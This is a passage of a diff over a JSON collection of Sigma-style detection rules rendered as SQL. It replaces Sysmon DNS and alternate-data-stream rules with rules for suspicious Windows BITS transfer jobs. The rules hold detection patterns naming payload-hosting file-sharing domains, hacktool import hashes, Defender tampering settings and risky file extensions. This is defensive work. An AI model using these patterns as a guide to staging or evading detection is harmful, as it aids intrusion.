Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "title": "New BITS Job Created Via Bitsadmin", + "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "description": "Detects the creation of a new bits job by Bitsadmin", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_bits_client_new_job_via_bitsadmin.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "author": "frack113", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "New BITS Job Created Via PowerShell", + "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new bits job by PowerShell", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_job_via_powershell.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' 